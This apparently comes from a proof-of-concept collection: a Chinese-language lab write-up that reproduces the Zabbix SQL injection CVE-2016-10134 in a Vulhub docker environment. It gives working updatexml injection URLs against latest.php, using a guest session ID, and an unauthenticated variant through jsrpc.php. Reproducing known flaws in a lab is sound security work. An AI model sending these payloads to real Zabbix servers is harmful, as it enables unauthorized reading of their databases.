Awesome-POC/中间件漏洞/Zabbix latest.php SQL注入漏洞 CVE-2016-10134.md
2024-11-06 14:10:36 +08:00

37 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Zabbix latest.php SQL注入漏洞 CVE-2016-10134
## 漏洞描述
zabbix是一款服务器监控软件其由server、agent、web等模块组成其中web模块由PHP编写用来显示数据库中的结果。
## 环境搭建
Vulhub执行如下命令启动zabbix 3.0.3
```
docker-compose up -d
```
执行命令后将启动数据库mysql、zabbix server、zabbix agent、zabbix web。如果内存稍小可能会存在某个容器挂掉的情况我们可以通过`docker-compose ps`查看容器状态,并通过`docker-compose start`来重新启动容器。
## 漏洞复现
访问`http://your-ip:8080/index.php`,用账号`guest`(密码为空)登录游客账户。
登录后查看Cookie中的`zbx_sessionid`复制后16位字符
```
zbx_sessionid=cb4f5e3307ffbca669d1a14be14dc1e0
```
![image-20220302233506525](images/202203022335590.png)
将这16个字符作为sid的值访问`http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`,可见成功注入:
![image-20220302233802973](images/202203022338075.png)
这个漏洞也可以通过jsrpc.php触发且无需登录`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`
![image-20220302233854678](images/202203022338774.png)